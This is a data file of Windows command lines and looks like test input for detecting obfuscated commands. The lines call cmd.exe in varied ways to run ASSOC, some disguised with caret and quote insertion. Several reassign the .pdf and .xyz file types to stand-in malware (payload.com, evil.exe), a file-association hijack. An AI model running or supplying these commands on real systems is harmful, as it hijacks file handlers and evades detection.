%COMSPEC% /C ASSOC '.txt'=txtfile
%COMSPEC% /C ASSOC .html
%COMSPEC% /C ASSOC .pdf="C:\temp\payload.com"
%COMSPEC% /C ASSOC .xyz=evil.exe
%COMSPEC% /C a^s^soc '.txt'=txtfile
%COMSPEC% /C a^s^soc .html
%COMSPEC% /C a^s^soc .pdf="C:\temp\payload.com"
%COMSPEC% /C a^s^soc .xyz=evil.exe
%COMSPEC% /C as''oc '.txt'=txtfile
%COMSPEC% /C as''oc .html
%COMSPEC% /C as''oc .pdf="C:\temp\payload.com"
%COMSPEC% /C as''oc .xyz=evil.exe
%COMSPEC% /C assoc '.txt'=txtfile
%COMSPEC% /C assoc .html
%COMSPEC% /C assoc .pdf="C:\temp\payload.com"
%COMSPEC% /C assoc .xyz=evil.exe
%COMSPEC% /c ASSOC '.txt'=txtfile
%COMSPEC% /c ASSOC .html
%COMSPEC% /c ASSOC .pdf="C:\temp\payload.com"
%COMSPEC% /c ASSOC .xyz=evil.exe
%COMSPEC% /c a^s^soc '.txt'=txtfile
%COMSPEC% /c a^s^soc .html
%COMSPEC% /c a^s^soc .pdf="C:\temp\payload.com"
%COMSPEC% /c a^s^soc .xyz=evil.exe
%COMSPEC% /c as''oc '.txt'=txtfile
%COMSPEC% /c as''oc .html
%COMSPEC% /c as''oc .pdf="C:\temp\payload.com"
%COMSPEC% /c as''oc .xyz=evil.exe
%COMSPEC% /c assoc '.txt'=txtfile
%COMSPEC% /c assoc .html
%COMSPEC% /c assoc .pdf="C:\temp\payload.com"
%COMSPEC% /c assoc .xyz=evil.exe
%windir%\system32\cmd.exe /C ASSOC '.txt'=txtfile
%windir%\system32\cmd.exe /C ASSOC .html
%windir%\system32\cmd.exe /C ASSOC .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /C ASSOC .xyz=evil.exe
%windir%\system32\cmd.exe /C a^s^soc '.txt'=txtfile
%windir%\system32\cmd.exe /C a^s^soc .html
%windir%\system32\cmd.exe /C a^s^soc .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /C a^s^soc .xyz=evil.exe
%windir%\system32\cmd.exe /C as''oc '.txt'=txtfile
%windir%\system32\cmd.exe /C as''oc .html
%windir%\system32\cmd.exe /C as''oc .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /C as''oc .xyz=evil.exe
%windir%\system32\cmd.exe /C assoc '.txt'=txtfile
%windir%\system32\cmd.exe /C assoc .html
%windir%\system32\cmd.exe /C assoc .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /C assoc .xyz=evil.exe
%windir%\system32\cmd.exe /c ASSOC '.txt'=txtfile
%windir%\system32\cmd.exe /c ASSOC .html
%windir%\system32\cmd.exe /c ASSOC .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /c ASSOC .xyz=evil.exe
%windir%\system32\cmd.exe /c a^s^soc '.txt'=txtfile
%windir%\system32\cmd.exe /c a^s^soc .html
%windir%\system32\cmd.exe /c a^s^soc .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /c a^s^soc .xyz=evil.exe
%windir%\system32\cmd.exe /c as''oc '.txt'=txtfile
%windir%\system32\cmd.exe /c as''oc .html
%windir%\system32\cmd.exe /c as''oc .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /c as''oc .xyz=evil.exe
%windir%\system32\cmd.exe /c assoc '.txt'=txtfile
%windir%\system32\cmd.exe /c assoc .html
%windir%\system32\cmd.exe /c assoc .pdf="C:\temp\payload.com"
%windir%\system32\cmd.exe /c assoc .xyz=evil.exe
cmd /C ASSOC '.txt'=txtfile
cmd /C ASSOC .html
cmd /C ASSOC .pdf="C:\temp\payload.com"
cmd /C ASSOC .xyz=evil.exe
cmd /C a^s^soc '.txt'=txtfile
cmd /C a^s^soc .html
cmd /C a^s^soc .pdf="C:\temp\payload.com"
cmd /C a^s^soc .xyz=evil.exe
cmd /C as''oc '.txt'=txtfile
cmd /C as''oc .html
cmd /C as''oc .pdf="C:\temp\payload.com"
cmd /C as''oc .xyz=evil.exe
cmd /C assoc '.txt'=txtfile
cmd /C assoc .html
cmd /C assoc .pdf="C:\temp\payload.com"
cmd /C assoc .xyz=evil.exe
cmd /c ASSOC '.txt'=txtfile
cmd /c ASSOC .html
cmd /c ASSOC .pdf="C:\temp\payload.com"
cmd /c ASSOC .xyz=evil.exe
cmd /c a^s^soc '.txt'=txtfile
cmd /c a^s^soc .html
cmd /c a^s^soc .pdf="C:\temp\payload.com"
cmd /c a^s^soc .xyz=evil.exe
cmd /c as''oc '.txt'=txtfile
cmd /c as''oc .html
cmd /c as''oc .pdf="C:\temp\payload.com"
cmd /c as''oc .xyz=evil.exe
cmd /c assoc '.txt'=txtfile
cmd /c assoc .html
cmd /c assoc .pdf="C:\temp\payload.com"
cmd /c assoc .xyz=evil.exe
cmd.exe /C ASSOC '.txt'=txtfile
cmd.exe /C ASSOC .html
cmd.exe /C ASSOC .pdf="C:\temp\payload.com"
cmd.exe /C ASSOC .xyz=evil.exe
cmd.exe /C a^s^soc '.txt'=txtfile
cmd.exe /C a^s^soc .html
cmd.exe /C a^s^soc .pdf="C:\temp\payload.com"
cmd.exe /C a^s^soc .xyz=evil.exe
cmd.exe /C as''oc '.txt'=txtfile
cmd.exe /C as''oc .html
cmd.exe /C as''oc .pdf="C:\temp\payload.com"
cmd.exe /C as''oc .xyz=evil.exe
cmd.exe /C assoc '.txt'=txtfile
cmd.exe /C assoc .html
cmd.exe /C assoc .pdf="C:\temp\payload.com"
cmd.exe /C assoc .xyz=evil.exe
cmd.exe /c ASSOC '.txt'=txtfile
cmd.exe /c ASSOC .html
cmd.exe /c ASSOC .pdf="C:\temp\payload.com"
cmd.exe /c ASSOC .xyz=evil.exe
cmd.exe /c a^s^soc '.txt'=txtfile
cmd.exe /c a^s^soc .html
cmd.exe /c a^s^soc .pdf="C:\temp\payload.com"
cmd.exe /c a^s^soc .xyz=evil.exe
cmd.exe /c as''oc '.txt'=txtfile
cmd.exe /c as''oc .html
cmd.exe /c as''oc .pdf="C:\temp\payload.com"
cmd.exe /c as''oc .xyz=evil.exe
cmd.exe /c assoc '.txt'=txtfile
cmd.exe /c assoc .html
cmd.exe /c assoc .pdf="C:\temp\payload.com"
cmd.exe /c assoc .xyz=evil.exe
